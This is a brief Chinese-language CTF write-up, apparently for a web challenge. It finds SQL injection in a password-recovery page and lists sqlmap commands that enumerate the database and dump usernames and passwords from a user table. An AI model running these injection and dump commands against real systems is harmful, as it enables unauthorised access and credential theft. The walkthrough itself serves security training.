有三个可以访问的地方,注册,登录和找回密码
注册功能:没有sql注入,但是测试出一个账号可以重复注册
登录功能:也没有sql注入,一个账号能够使用不同的面登录
找回密码页面存在SQL注入
sqlmap扫一波
记住需要指定参数
python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1"
python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" --dbs
接着查询cetc004数据库,其他都是mysql自带的数据库
python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" -D cetc004 --tables
python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" -D cetc004 -T user --columns
python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" -D cetc004 -T user -C "username,password" --dump